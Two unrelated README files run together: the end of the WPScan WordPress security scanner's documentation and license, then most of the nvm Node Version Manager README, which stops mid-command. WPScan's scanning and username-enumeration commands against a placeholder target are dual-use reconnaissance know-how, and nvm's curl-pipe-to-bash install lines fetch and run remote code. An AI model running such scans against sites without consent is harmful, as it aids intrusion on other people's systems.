wpscanteam/wpscan --url https://target.tld/ --enumerate u ``` Enumerating a range of usernames ```shell docker run -it --rm wpscanteam/wpscan --url https://target.tld/ --enumerate u1-100 ``` ** replace u1-100 with a range of your choice. # Usage Full user documentation can be found here; https://github.com/wpscanteam/wpscan/wiki/WPScan-User-Documentation ```wpscan --url blog.tld``` This will scan the blog using default options with a good compromise between speed and accuracy. For example, the plugins will be checked passively but their version with a mixed detection mode (passively + aggressively). Potential config backup files will also be checked, along with other interesting findings. If a more stealthy approach is required, then ```wpscan --stealthy --url blog.tld``` can be used. As a result, when using the ```--enumerate``` option, don't forget to set the ```--plugins-detection``` accordingly, as its default is 'passive'. For more options, open a terminal and type ```wpscan --help``` (if you built wpscan from the source, you should type the command outside of the git repo) The DB is located at ~/.wpscan/db ## Vulnerability Database The WPScan CLI tool uses the [WPScan API](https://wpscan.com/api) to retrieve WordPress vulnerability data in real time. For WPScan to retrieve the vulnerability data an API token must be supplied via the `--api-token` option, or via a configuration file, as discussed below. An API token can be obtained by registering an account on [WPScan](https://wpscan.com/register). Up to 50 API requests per day are given free of charge to registered users. Once the 50 API requests are exhausted, WPScan will continue to work as normal but without any vulnerability data. Users can upgrade to paid API usage to increase their API limits within their user profile on [WPScan](https://wpscan.com/). ## Load CLI options from file/s WPScan can load all options (including the --url) from configuration files, the following locations are checked (order: first to last): - ~/.wpscan/scan.json - ~/.wpscan/scan.yml - pwd/.wpscan/scan.json - pwd/.wpscan/scan.yml If those files exist, options from the `cli_options` key will be loaded and overridden if found twice. e.g: ~/.wpscan/scan.yml: ```yml cli_options: proxy: 'http://127.0.0.1:8080' verbose: true ``` pwd/.wpscan/scan.yml: ```yml cli_options: proxy: 'socks5://127.0.0.1:9090' url: 'http://target.tld' ``` Running ```wpscan``` in the current directory (pwd), is the same as ```wpscan -v --proxy socks5://127.0.0.1:9090 --url http://target.tld``` ## Save API Token in a file The feature mentioned above is useful to keep the API Token in a config file and not have to supply it via the CLI each time. To do so, create the ~/.wpscan/scan.yml file containing the below: ```yml cli_options: api_token: YOUR_API_TOKEN ``` ## Load API Token From ENV (since v3.7.10) The API Token will be automatically loaded from the ENV variable `WPSCAN_API_TOKEN` if present. If the `--api-token` CLI option is also provided, the value from the CLI will be used. ## Enumerating usernames ```shell wpscan --url https://target.tld/ --enumerate u ``` Enumerating a range of usernames ```shell wpscan --url https://target.tld/ --enumerate u1-100 ``` ** replace u1-100 with a range of your choice. # LICENSE ## WPScan Public Source License The WPScan software (henceforth referred to simply as "WPScan") is dual-licensed - Copyright 2011-2019 WPScan Team. Cases that include commercialization of WPScan require a commercial, non-free license. Otherwise, WPScan can be used without charge under the terms set out below. ### 1. Definitions 1.1 "License" means this document. 1.2 "Contributor" means each individual or legal entity that creates, contributes to the creation of, or owns WPScan. 1.3 "WPScan Team" means WPScan’s core developers. ### 2. Commercialization A commercial use is one intended for commercial advantage or monetary compensation. Example cases of commercialization are: - Using WPScan to provide commercial managed/Software-as-a-Service services. - Distributing WPScan as a commercial product or as part of one. - Using WPScan as a value added service/product. Example cases which do not require a commercial license, and thus fall under the terms set out below, include (but are not limited to): - Penetration testers (or penetration testing organizations) using WPScan as part of their assessment toolkit. - Penetration Testing Linux Distributions including but not limited to Kali Linux, SamuraiWTF, BackBox Linux. - Using WPScan to test your own systems. - Any non-commercial use of WPScan. If you need to purchase a commercial license or are unsure whether you need to purchase a commercial license contact us - [email protected]. Free-use Terms and Conditions; ### 3. Redistribution Redistribution is permitted under the following conditions: - Unmodified License is provided with WPScan. - Unmodified Copyright notices are provided with WPScan. - Does not conflict with the commercialization clause. ### 4. Copying Copying is permitted so long as it does not conflict with the Redistribution clause. ### 5. Modification Modification is permitted so long as it does not conflict with the Redistribution clause. ### 6. Contributions Any Contributions assume the Contributor grants the WPScan Team the unlimited, non-exclusive right to reuse, modify and relicense the Contributor's content. ### 7. Support WPScan is provided under an AS-IS basis and without any support, updates or maintenance. Support, updates and maintenance may be given according to the sole discretion of the WPScan Team. ### 8. Disclaimer of Warranty WPScan is provided under this License on an “as is” basis, without warranty of any kind, either expressed, implied, or statutory, including, without limitation, warranties that the WPScan is free of defects, merchantable, fit for a particular purpose or non-infringing. ### 9. Limitation of Liability To the extent permitted under Law, WPScan is provided under an AS-IS basis. The WPScan Team shall never, and without any limit, be liable for any damage, cost, expense or any other payment incurred as a result of WPScan's actions, failure, bugs and/or any other interaction between WPScan and end-equipment, computers, other software or any 3rd party, end-equipment, computer or services. ### 10. Disclaimer Running WPScan against websites without prior mutual consent may be illegal in your country. The WPScan Team accept no liability and are not responsible for any misuse or damage caused by WPScan. ### 11. Trademark The "wpscan" term is a registered trademark. This License does not grant the use of the "wpscan" trademark or the use of the WPScan logo.
# Node Version Manager [![Build Status](https://travis-ci.org/nvm-sh/nvm.svg?branch=master)][3] [![nvm version](https://img.shields.io/badge/version-v0.38.0-yellow.svg)][4] [![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/684/badge)](https://bestpractices.coreinfrastructure.org/projects/684) <!-- To update this table of contents, ensure you have run `npm install` then `npm run doctoc` --> <!-- START doctoc generated TOC please keep comment here to allow auto update --> <!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE --> ## Table of Contents - [Intro](#intro) - [About](#about) - [Installing and Updating](#installing-and-updating) - [Install & Update Script](#install--update-script) - [Additional Notes](#additional-notes) - [Troubleshooting on Linux](#troubleshooting-on-linux) - [Troubleshooting on macOS](#troubleshooting-on-macos) - [Ansible](#ansible) - [Verify Installation](#verify-installation) - [Important Notes](#important-notes) - [Git Install](#git-install) - [Manual Install](#manual-install) - [Manual Upgrade](#manual-upgrade) - [Usage](#usage) - [Long-term Support](#long-term-support) - [Migrating Global Packages While Installing](#migrating-global-packages-while-installing) - [Default Global Packages From File While Installing](#default-global-packages-from-file-while-installing) - [io.js](#iojs) - [System Version of Node](#system-version-of-node) - [Listing Versions](#listing-versions) - [Setting Custom Colors](#setting-custom-colors) - [Persisting custom colors](#persisting-custom-colors) - [Suppressing colorized output](#suppressing-colorized-output) - [Restoring PATH](#restoring-path) - [Set default node version](#set-default-node-version) - [Use a mirror of node binaries](#use-a-mirror-of-node-binaries) - [.nvmrc](#nvmrc) - [Deeper Shell Integration](#deeper-shell-integration) - [bash](#bash) - [Automatically call `nvm use`](#automatically-call-nvm-use) - [zsh](#zsh) - [Calling `nvm use` automatically in a directory with a `.nvmrc` file](#calling-nvm-use-automatically-in-a-directory-with-a-nvmrc-file) - [fish](#fish) - [Calling `nvm use` automatically in a directory with a `.nvmrc` file](#calling-nvm-use-automatically-in-a-directory-with-a-nvmrc-file-1) - [Running Tests](#running-tests) - [Environment variables](#environment-variables) - [Bash Completion](#bash-completion) - [Usage](#usage-1) - [Compatibility Issues](#compatibility-issues) - [Installing nvm on Alpine Linux](#installing-nvm-on-alpine-linux) - [Uninstalling / Removal](#uninstalling--removal) - [Manual Uninstall](#manual-uninstall) - [Docker For Development Environment](#docker-for-development-environment) - [Problems](#problems) - [macOS Troubleshooting](#macos-troubleshooting) - [Maintainers](#maintainers) - [License](#license) - [Copyright notice](#copyright-notice) <!-- END doctoc generated TOC please keep comment here to allow auto update --> ## Intro `nvm` allows you to quickly install and use different versions of node via the command line. **Example:** ```sh $ nvm use 16 Now using node v16.9.1 (npm v7.21.1) $ node -v v16.9.1 $ nvm use 14 Now using node v14.18.0 (npm v6.14.15) $ node -v v14.18.0 $ nvm install 12 Now using node v12.22.6 (npm v6.14.5) $ node -v v12.22.6 ``` Simple as that! ## About nvm is a version manager for [node.js](https://nodejs.org/en/), designed to be installed per-user, and invoked per-shell. `nvm` works on any POSIX-compliant shell (sh, dash, ksh, zsh, bash), in particular on these platforms: unix, macOS, and windows WSL. <a id="installation-and-update"></a> <a id="install-script"></a> ## Installing and Updating ### Install & Update Script To **install** or **update** nvm, you should run the [install script][2]. To do that, you may either download and run the script manually, or use the following cURL or Wget command: ```sh curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.38.0/install.sh | bash ``` ```sh wget -qO- https://raw.githubusercontent.com/nvm-sh/nvm/v0.38.0/install.sh | bash ``` Running either of the above commands downloads a script and runs it. The script clones the nvm repository to `~/.nvm`, and attempts to add the source lines from the snippet below to the correct profile file (`~/.bash_profile`, `~/.zshrc`, `~/.profile`, or `~/.bashrc`). <a id="profile_snippet"></a> ```sh export NVM_DIR="$([ -z "${XDG_CONFIG_HOME-}" ] && printf %s "${HOME}/.nvm" || printf %s "${XDG_CONFIG_HOME}/nvm")" [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm ``` #### Additional Notes - If the environment variable `$XDG_CONFIG_HOME` is present, it will place the `nvm` files there.</sub> - You can add `--no-use` to the end of the above script (...`nvm.sh --no-use`) to postpone using `nvm` until you manually [`use`](#usage) it. - You can customize the install source, directory, profile, and version using the `NVM_SOURCE`, `NVM_DIR`, `PROFILE`, and `NODE_VERSION` variables. Eg: `curl ... | NVM_DIR="path/to/nvm"`. Ensure that the `NVM_DIR` does not contain a trailing slash. - The installer can use `git`, `curl`, or `wget` to download `nvm`, whichever is available. #### Troubleshooting on Linux On Linux, after running the install script, if you get `nvm: command not found` or see no feedback from your terminal after you type `command -v nvm`, simply close your current terminal, open a new terminal, and try verifying again. Alternatively, you can run the following commands for the different shells on the command line: *bash*: `source ~/.bashrc` *zsh*: `source ~/.zshrc` *ksh*: `. ~/.profile` These should pick up the `nvm` command. #### Troubleshooting on macOS Since OS X 10.9, `/usr/bin/git` has been preset by Xcode command line tools, which means we can't properly detect if Git is installed or not. You need to manually install the Xcode command line tools before running the install script, otherwise, it'll fail. (see [#1782](https://github.com/nvm-sh/nvm/issues/1782)) If you get `nvm: command not found` after running the install script, one of the following might be the reason: - Since macOS 10.15, the default shell is `zsh` and nvm will look for `.zshrc` to update, none is installed by default. Create one with `touch ~/.zshrc` and run the install script again. - If you use bash, the previous default shell, your system may not have a `.bash_profile` file where the command is set up. Create one with `touch ~/.bash_profile` and run the install script again. Then, run `source ~/.bash_profile` to pick up the `nvm` command. - You have previously used `bash`, but you have `zsh` installed. You need to manually add [these lines](#manual-install) to `~/.zshrc` and run `. ~/.zshrc`. - You might need to restart your terminal instance or run `. ~/.nvm/nvm.sh`. Restarting your terminal/opening a new tab/window, or running the source command will load the command and the new configuration. - If the above didn't help, you might need to restart your terminal instance. Try opening a new tab/window in your terminal and retry. If the above doesn't fix the problem, you may try the following: - If you use bash, it may be that your `.bash_profile` (or `~/.profile`) does not source your `~/.bashrc` properly. You could fix this by adding `source ~/<your_profile_file>` to it or follow the next step below. - Try adding [the snippet from the install section](#profile_snippet), that finds the correct nvm directory and loads nvm, to your usual profile (`~/.bash_profile`, `~/.zshrc`, `~/.profile`, or `~/.bashrc`). - For more information about this issue and possible workarounds, please [refer here](https://github.com/nvm-sh/nvm/issues/576) #### Ansible You can use a task: ```yaml - name: nvm shell: > curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.38.0/install.sh | bash args: creates: "{{ ansible_env.HOME }}/.nvm/nvm.sh" ``` ### Verify Installation To verify that nvm has been installed, do: ```sh command -v nvm ``` which should output `nvm` if the installation was successful. Please note that `which nvm` will not work, since `nvm` is a sourced shell function, not an executable binary. **Note:** On Linux, after running the install script, if you get `nvm: command not found` or see no feedback from your terminal after you type `command -v nvm`, simply close your current terminal, open a new terminal, and try verifying again. ### Important Notes If you're running a system without prepackaged binary available, which means you're going to install nodejs or io.js from its source code, you need to make sure your system has a C++ compiler. For OS X, Xcode will work, for Debian/Ubuntu based GNU/Linux, the `build-essential` and `libssl-dev` packages work. **Note:** `nvm` also support Windows in some cases. It should work through WSL (Windows Subsystem for Linux) depending on the version of WSL. It should also work with [GitBash](https://gitforwindows.org/) (MSYS) or [Cygwin](https://cygwin.com). Otherwise, for Windows, a few alternatives exist, which are neither supported nor developed by us: - [nvm-windows](https://github.com/coreybutler/nvm-windows) - [nodist](https://github.com/marcelklehr/nodist) - [nvs](https://github.com/jasongin/nvs) **Note:** `nvm` does not support [Fish] either (see [#303](https://github.com/nvm-sh/nvm/issues/303)). Alternatives exist, which are neither supported nor developed by us: - [bass](https://github.com/edc/bass) allows you to use utilities written for Bash in fish shell - [fast-nvm-fish](https://github.com/brigand/fast-nvm-fish) only works with version numbers (not aliases) but doesn't significantly slow your shell startup - [plugin-nvm](https://github.com/derekstavis/plugin-nvm) plugin for [Oh My Fish](https://github.com/oh-my-fish/oh-my-fish), which makes nvm and its completions available in fish shell - [fnm](https://github.com/fisherman/fnm) - [fisherman](https://github.com/fisherman/fisherman)-based version manager for fish - [fish-nvm](https://github.com/FabioAntunes/fish-nvm) - Wrapper around nvm for fish, delays sourcing nvm until it's actually used. **Note:** We still have some problems with FreeBSD, because there is no official pre-built binary for FreeBSD, and building from source may need [patches](https://www.freshports.org/www/node/files/patch-deps_v8_src_base_platform_platform-posix.cc); see the issue ticket: - [[#900] [Bug] nodejs on FreeBSD may need to be patched](https://github.com/nvm-sh/nvm/issues/900) - [nodejs/node#3716](https://github.com/nodejs/node/issues/3716) **Note:** On OS X, if you do not have Xcode installed and you do not wish to download the ~4.3GB file, you can install the `Command Line Tools`. You can check out this blog post on how to just that: - [How to Install Command Line Tools in OS X Mavericks & Yosemite (Without Xcode)](http://osxdaily.com/2014/02/12/install-command-line-tools-mac-os-x/) **Note:** On OS X, if you have/had a "system" node installed and want to install modules globally, keep in mind that: - When using `nvm` you do not need `sudo` to globally install a module with `npm -g`, so instead of doing `sudo npm install -g grunt`, do instead `npm install -g grunt` - If you have an `~/.npmrc` file, make sure it does not contain any `prefix` settings (which is not compatible with `nvm`) - You can (but should not?) keep your previous "system" node install, but `nvm` will only be available to your user account (the one used to install nvm). This might cause version mismatches, as other users will be using `/usr/local/lib/node_modules/*` VS your user account using `~/.nvm/versions/node/vX.X.X/lib/node_modules/*` Homebrew installation is not supported. If you have issues with homebrew-installed `nvm`, please `brew uninstall` it, and install it using the instructions below, before filing an issue. **Note:** If you're using `zsh` you can easily install `nvm` as a zsh plugin. Install [`zsh-nvm`](https://github.com/lukechilds/zsh-nvm) and run `nvm upgrade` to upgrade. **Note:** Git versions before v1.7 may face a problem of cloning `nvm` source from GitHub via https protocol, and there is also different behavior of git before v1.6, and git prior to [v1.17.10](https://github.com/git/git/commit/5a7d5b683f869d3e3884a89775241afa515da9e7) can not clone tags, so the minimum required git version is v1.7.10. If you are interested in the problem we mentioned here, please refer to GitHub's [HTTPS cloning errors](https://help.github.com/articles/https-cloning-errors/) article. ### Git Install If you have `git` installed (requires git v1.7.10+): 1. clone this repo in the root of your user profile - `cd ~/` from anywhere then `git clone https://github.com/nvm-sh/nvm.git .nvm` 1. `cd ~/.nvm` and check out the latest version with `git checkout v0.38.0` 1. activate `nvm` by sourcing it from your shell: `. ./nvm.sh` Now add these lines to your `~/.bashrc`, `~/.profile`, or `~/.zshrc` file to have it automatically sourced upon login: (you may have to add to more than one of the above files) ```sh export NVM_DIR="$HOME/.nvm" [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm [ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion" # This loads nvm bash_completion ``` ### Manual Install For a fully manual install, execute the following lines to first clone the `nvm` repository into `$HOME/.nvm`, and then load `nvm`: ```sh export NVM_DIR="$HOME/.nvm" && ( git clone https://github.com/nvm-sh/nvm.git "$NVM_DIR" cd "$NVM_DIR" git checkout `git describe --abbrev=0 --tags --match "v[0-9]*" $(git rev-list --tags --max-count=1)` ) && \. "$NVM_DIR/nvm.sh" ``` Now add these lines to your `~/.bashrc`, `~/.profile`, or `~/.zshrc` file to have it automatically sourced upon login: (you may have to add to more than one of the above files) ```sh export NVM_DIR="$HOME/.nvm" [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm ``` ### Manual Upgrade For manual upgrade with `git` (requires git v1.7.10+): 1. change to the `$NVM_DIR` 1. pull down the latest changes 1. check out the latest version 1. activate the new version ```sh ( cd "$NVM_DIR" git fetch --tags origin git checkout `git describe --abbrev=0 --tags --match "v[0-9]*" $(git rev-list --tags --max-count=1)` ) && \. "$NVM_DIR/nvm.sh" ``` ## Usage To download, compile, and install the latest release of node, do this: ```sh nvm install node # "node" is an alias for the latest version ``` To install a specific version of node: ```sh nvm install 14.7.0 # or 16.3.0, 12.22.1, etc ``` The first version installed becomes the default. New shells will start with the default version of node (e.g., `nvm alias default`). You can list available versions using `ls-remote`: ```sh nvm ls-remote ``` And then in any new shell just use the installed version: ```sh nvm use node ``` Or you can just run it: ```sh nvm run node --version ``` Or, you can run any arbitrary command in a subshell with the desired version of node: ```sh nvm exec 4.2 node --version ``` You can also get the path to the executable to where it was installed: ```sh nvm which 12.22 ``` In place of a version pointer like "14.7" or "16.3" or "12.22.1", you can use the following special default aliases with `nvm install`, `nvm use`, `nvm run`, `nvm exec`, `nvm which`, etc: - `node`: this installs the latest version of [`node`](https://nodejs.org/en/) - `iojs`: this installs the latest version of [`io.js`](https://iojs.org/en/) - `stable`: this alias is deprecated, and only truly applies to `node` `v0.12` and earlier. Currently, this is an alias for `node`. - `unstable`: this alias points to `node` `v0.11` - the last "unstable" node release, since post-1.0, all node versions are stable. (in SemVer, versions communicate breakage, not stability). ### Long-term Support Node has a [schedule](https://github.com/nodejs/Release#release-schedule) for long-term support (LTS) You can reference LTS versions in aliases and `.nvmrc` files with the notation `lts/*` for the latest LTS, and `lts/argon` for LTS releases from the "argon" line, for example. In addition, the following commands support LTS arguments: - `nvm install --lts` / `nvm install --lts=argon` / `nvm install 'lts/*'` / `nvm install lts/argon` - `nvm uninstall --lts` / `nvm uninstall --lts=argon` / `nvm uninstall 'lts/*'` / `nvm uninstall lts/argon` - `nvm use --lts` / `nvm use --lts=argon` / `nvm use 'lts/*'` / `nvm use lts/argon` - `nvm exec --lts` / `nvm exec --lts=argon` / `nvm exec 'lts/*'` / `nvm exec lts/argon` - `nvm run --lts` / `nvm run --lts=argon` / `nvm run 'lts/*'` / `nvm run lts/argon` - `nvm ls-remote --lts` / `nvm ls-remote --lts=argon` `nvm ls-remote 'lts/*'` / `nvm ls-remote lts/argon` - `nvm version-remote --lts` / `nvm version-remote --lts=argon` / `nvm version-remote 'lts/*'` / `nvm version-remote lts/argon` Any time your local copy of `nvm` connects to https://nodejs.org, it will re-create the appropriate local aliases for all available LTS lines. These aliases (stored under `$NVM_DIR/alias/lts`), are managed by `nvm`, and you should not modify, remove, or create these files - expect your changes to be undone, and expect meddling with these files to cause bugs that will likely not be supported. To get the latest LTS version of node and migrate your existing installed packages, use ```sh nvm install 'lts/*' --reinstall-packages-from=current ``` ### Migrating Global Packages While Installing If you want to install a new version of Node.js and migrate npm packages from a previous version: ```sh nvm install node --reinstall-packages-from=node ``` This will first use "nvm version node" to identify the current version you're migrating packages from. Then it resolves the new version to install from the remote server and installs it. Lastly, it runs "nvm reinstall-packages" to reinstall the npm packages from your prior version of Node to the new one. You can also install and migrate npm packages from specific versions of Node like this: ```sh nvm install 6 --reinstall-packages-from=5 nvm install v4.2 --reinstall-packages-from=iojs ``` Note that reinstalling packages _explicitly does not update the npm version_ — this is to ensure that npm isn't accidentally upgraded to a broken version for the new node version. To update npm at the same time add the `--latest-npm` flag, like this: ```sh nvm install 'lts/*' --reinstall-packages-from=default --latest-npm ``` or, you can at any time run the following command to get the latest supported npm version on the current node version: ```sh nvm install-latest-npm ``` If you've already gotten an error to the effect of "npm does not support Node.js", you'll need to (1) revert to a previous node version (`nvm ls` & `nvm use <your latest _working_ version from the ls>`, (2) delete the newly created node version (`nvm uninstall <your _broken_ version of node from the ls>`), then (3) rerun your `nvm install` with the `--latest-npm` flag. ### Default Global Packages From File While Installing If you have a list of default packages you want installed every time you install a new version, we support that too -- just add the package names, one per line, to the file `$NVM_DIR/default-packages`. You can add anything npm would accept as a package argument on the command line. ```sh # $NVM_DIR/default-packages rimraf [email protected] stevemao/left-pad ``` ### io.js If you want to install [io.js](https://github.com/iojs/io.js/): ```sh nvm install iojs ``` If you want to install a new version of io.js and migrate npm packages from a previous version: ```sh nvm install iojs --reinstall-packages-from=iojs ``` The same guidelines mentioned for migrating npm packages in node are applicable to io.js. ### System Version of Node If you want to use the system-installed version of node, you can use the special default alias "system": ```sh nvm use system nvm run system --version ``` ### Listing Versions If you want to see what versions are installed: ```sh nvm ls ``` If you want to see what versions are available to install: ```sh nvm ls-remote ``` ### Setting Custom Colors You can set five colors that will be used to display version and alias information. These colors replace the default colors. Initial colors are: g b y r e Color codes: r/R = red / bold red g/G = green / bold green b/B = blue / bold blue c/C = cyan / bold cyan m/M = magenta / bold magenta y/Y = yellow / bold yellow k/K = black / bold black e/W = light grey / white ```sh nvm set-colors rgBcm ``` #### Persisting custom colors If you want the custom colors to persist after terminating the shell, export the NVM_COLORS variable in your shell profile. For example, if you want to use cyan, magenta, green, bold red and bold yellow, add the following line: ```sh export NVM_COLORS='cmgRY' ``` #### Suppressing colorized output `nvm help (or -h or --help)`, `nvm ls`, `nvm ls-remote` and `nvm alias` usually produce colorized output. You can disable colors with the `--no-colors` option (or by setting the environment variable `TERM=dumb`): ```sh nvm ls --no-colors nvm help --no-colors TERM=dumb nvm ls ``` #### Restoring PATH To restore your PATH, you can deactivate it: ```sh nvm deactivate ``` #### Set default node version To set a default Node version to be used in any new shell, use the alias 'default': ```sh nvm alias default node ``` #### Use a mirror of node binaries To use a mirror of the node binaries, set `$NVM_NODEJS_ORG_MIRROR`: ```sh export NVM_NODEJS_ORG_MIRROR=https://nodejs.org/dist nvm install node NVM_NODEJS_ORG_MIRROR=https://nodejs.org/dist nvm install 4.2 ``` To use a mirror of the io.js binaries, set `$NVM_IOJS_ORG_MIRROR`: ```sh export NVM_IOJS_ORG_MIRROR=https://iojs.org/dist nvm install iojs-v1.0.3 NVM_IOJS_ORG_MIRROR=https://iojs.org/dist nvm install iojs-v1.0.3 ``` `nvm use` will not, by default, create a "current" symlink. Set `$NVM_SYMLINK_CURRENT` to "true" to enable this behavior, which is sometimes useful for IDEs. Note that using `nvm` in multiple shell tabs with this environment variable enabled can cause race conditions. ### .nvmrc You can create a `.nvmrc` file containing a node version number (or any other string that `nvm` understands; see `nvm --help` for details) in the project root directory (or any parent directory). Afterwards, `nvm use`, `nvm install`, `nvm exec`, `nvm run`, and `nvm which` will use the version specified in the `.nvmrc` file if no version is supplied on the command line. For example, to make nvm default to the latest 5.9 release, the latest LTS version, or the latest node version for the current directory: ```sh $ echo "5.9" > .nvmrc $ echo "lts/*" > .nvmrc # to default to the latest LTS version $ echo "node" > .nvmrc # to default to the latest version ``` [NB these examples assume a POSIX-compliant shell version of `echo`. If you use a Windows `cmd` development environment, eg the `.nvmrc` file is used to configure a remote Linux deployment, then keep in mind the `"`s will be copied leading to an invalid file. Remove them.] Then when you run nvm: ```sh $ nvm use Found '/path/to/project/.nvmrc' with version <5.9> Now using node v5.9.1 (npm v3.7.3) ``` `nvm use` et. al. will traverse directory structure upwards from the current directory looking for the `.nvmrc` file. In other words, running `nvm use` et. al. in any subdirectory of a directory with an `.nvmrc` will result in that `.nvmrc` being utilized. The contents of a `.nvmrc` file **must** be the `<version>` (as described by `nvm --help`) followed by a newline. No trailing spaces are allowed, and the trailing newline is required. ### Deeper Shell Integration You can use [`avn`](https://github.com/wbyoung/avn) to deeply integrate into your shell and automatically invoke `nvm` when changing directories. `avn` is **not** supported by the `nvm` maintainers. Please [report issues to the `avn` team](https://github.com/wbyoung/avn/issues/new). If you prefer a lighter-weight solution, the recipes below have been contributed by `nvm` users. They are **not** supported by the `nvm` maintainers. We are, however, accepting pull requests for more examples. #### bash ##### Automatically call `nvm use` Put the following at the end of your `$HOME/.bashrc`: ```bash cdnvm() { command cd "$@"; nvm_path=$(nvm_find_up .nvmrc | tr -d '\n') # If there are no .nvmrc file, use the default nvm version if [[ ! $nvm_path = *[^[:space:]]* ]]; then declare default_version; default_version=$(nvm version default); # If there is no default version, set it to `node` # This will use the latest version on your machine if [[ $default_version == "N/A" ]]; then nvm alias default node; default_version=$(nvm version default); fi # If the current version is not the default version, set it to use the default version if [[ $(nvm current) != "$default_version" ]]; then nvm use default; fi elif [[ -s $nvm_path/.nvmrc && -r $nvm_path/.nvmrc ]]; then declare nvm_version nvm_version=$(<"$nvm_path"/.nvmrc) declare locally_resolved_nvm_version # `nvm ls` will check all locally-available versions # If there are multiple matching versions, take the latest one # Remove the `->` and `*` characters and spaces # `locally_resolved_nvm_version` will be `N/A` if no local versions are found locally_resolved_nvm_version=$(nvm ls --no-colors "$nvm_version" | tail -1 | tr -d '\->*' | tr -d '[:space:]') # If it is not already installed, install it # `nvm install` will implicitly use the newly-installed version if [[ "$locally_resolved_nvm_version" == "N/A" ]]; then nvm install "$nvm_version"; elif [[ $(nvm current) != "$locally_resolved_nvm_version" ]]; then nvm use "$nvm_version"; fi fi } alias cd='cdnvm' cd "$PWD" ``` This alias would search 'up' from your current directory in order to detect a `.nvmrc` file. If it finds it, it will switch to that version; if not, it will use the default version. #### zsh ##### Calling `nvm use` automatically in a directory with a `.nvmrc` file Put this into your `$HOME/.zshrc` to call `nvm use` automatically whenever you enter a directory that contains an `.nvmrc` file with a string telling nvm which node to `use`: ```zsh # place this after nvm initialization! autoload -U add-zsh-hook load-nvmrc() { local node_version="$(nvm version)" local nvmrc_path="$(nvm_find_nvmrc)" if [ -n "$nvmrc_path" ]; then local nvmrc_node_version=$(nvm version "$(cat "${nvmrc_path}")") if [ "$nvmrc_node_version" = "N/A" ]; then nvm install elif [ "$nvmrc_node_version" != "$node_version" ]; then nvm use fi elif [ "$node_version" != "$(nvm version default)" ]; then echo "Reverting to nvm default version" nvm use default fi } add-zsh-hook chpwd load-nvmrc load-nvmrc ``` #### fish ##### Calling `nvm use` automatically in a directory with a `.nvmrc` file This requires that you have [bass](https://github.com/edc/bass) installed. ```fish # ~/.config/fish/functions/nvm.fish function nvm bass source ~/.nvm/nvm.sh --no-use ';' nvm $argv end # ~/.config/fish/functions/nvm_find_nvmrc.fish function nvm_find_nvmrc bass source ~/.nvm/nvm.sh --no-use ';' nvm_find_nvmrc end # ~/.config/fish/functions/load_nvm.fish function load_nvm --on-variable="PWD" set -l default_node_version (nvm version default) set -l node_version (nvm version) set -l nvmrc_path (nvm_find_nvmrc) if test -n "$nvmrc_path" set -l nvmrc_node_version (nvm version (cat $nvmrc_path)) if test "$nvmrc_node_version" = "N/A" nvm install (cat $nvmrc_path) else if test nvmrc_node_version != node_version nvm use $nvmrc_node_version end else if test "$node_version" != "$default_node_version" echo "Reverting to default Node version" nvm use default end end # ~/.config/fish/config.fish # You must call it on initialization or listening to directory switching won't work load_nvm ``` ## Running Tests Tests are written in [Urchin]. Install Urchin (and other dependencies) like so: npm install There are slow tests and fast tests. The slow tests do things like install node and check that the right versions are used. The fast tests fake this to test things like aliases and uninstalling. From the root of the nvm git repository, run the fast tests like this: npm run test/fast Run the slow tests like this: npm run test/slow Run all of the tests like this: npm test Nota bene: Avoid running nvm while the tests are running. ## Environment variables nvm exposes the following environment variables: - `NVM_DIR` - nvm's installation directory. - `NVM_BIN` - where node, npm, and global packages for the active version of node are installed. - `NVM_INC` - node's include file directory (useful for building C/C++ addons for node). - `NVM_CD_FLAGS` - used to maintain compatibility with zsh. - `NVM_RC_VERSION` - version from .nvmrc file if being used. Additionally, nvm modifies `PATH`, and, if present, `MANPATH` and `NODE_PATH` when changing versions. ## Bash Completion To activate, you need to source `bash_completion`: ```sh [[ -r $NVM_DIR/bash_completion ]] && \. $NVM_DIR/bash_completion ``` Put the above sourcing line just below the sourcing line for nvm in your profile (`.bashrc`, `.bash_profile`). ### Usage nvm: > $ nvm <kbd>Tab</kbd> ``` alias deactivate install list-remote reinstall-packages uninstall version cache exec install-latest-npm ls run unload version-remote current help list ls-remote unalias use which ``` nvm alias: > $ nvm alias <kbd>Tab</kbd> ``` default iojs lts/* lts/argon lts/boron lts/carbon lts/dubnium lts/erbium node stable unstable ``` > $ nvm alias my_alias <kbd>Tab</kbd> ``` v10.22.0 v12.18.3 v14.8.0 ``` nvm use: > $ nvm use <kbd>Tab</kbd> ``` my_alias default v10.22.0 v12.18.3 v14.8.0 ``` nvm uninstall: > $ nvm uninstall <kbd>Tab</kbd> ``` my_alias default v10.22.0 v12.18.3 v14.8.0 ``` ## Compatibility Issues `nvm` will encounter some issues if you have some non-default settings set. (see [#606](https://github.com/creationix/nvm/issues/606)) The following are known to cause issues: Inside `~/.npmrc`: ```sh prefix='some/path' ``` Environment Variables: ```sh $NPM_CONFIG_PREFIX $PREFIX ``` Shell settings: ```sh set -e ``` ## Installing nvm on Alpine Linux In order to provide the best performance (and other optimisations), nvm will download and install pre-compiled binaries for Node (and npm) when you run `nvm install X`. The Node project compiles, tests and hosts/provides these pre-compiled binaries which are built for mainstream/traditional Linux distributions (such as Debian, Ubuntu, CentOS, RedHat et al). Alpine Linux, unlike mainstream/traditional Linux distributions, is based on [BusyBox](https://www.busybox.net/), a very compact (~5MB) Linux distribution. BusyBox (and thus Alpine Linux) uses a different C/C++ stack to most mainstream/traditional Linux distributions - [musl](https://www.musl-libc.org/). This makes binary programs built for such mainstream/traditional incompatible with Alpine Linux, thus we cannot simply `nvm install X` on Alpine Linux and expect the downloaded binary to run correctly - you'll likely see "...does not exist" errors if you try that. There is a `-s` flag for `nvm install` which requests nvm download Node source and compile it locally. If installing nvm on Alpine Linux *is* still what you want or need to do, you should be able to achieve this by running the following from you Alpine Linux shell: ```sh apk add -U curl bash ca-certificates openssl ncurses coreutils python2 make gcc g++ libgcc linux-headers grep util-linux binutils findutils curl -o- 